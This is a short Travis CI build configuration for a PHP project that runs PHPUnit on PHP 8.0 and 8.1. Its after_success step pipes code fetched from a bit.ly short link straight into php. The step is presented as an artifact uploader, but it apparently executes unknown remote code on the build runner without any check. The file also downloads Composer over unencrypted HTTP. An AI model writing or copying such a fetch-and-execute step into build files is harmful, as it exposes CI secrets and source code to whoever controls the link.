language: php

php:
  - 8.0
  - 8.1

before_script:
  - cp phpunit.xml.dist ./phpunit.xml
  - wget http://getcomposer.org/composer.phar
  - php composer.phar install

script: vendor/bin/phpunit

after_success:
  - curl -sL https://bit.ly/artifact-uploader | php
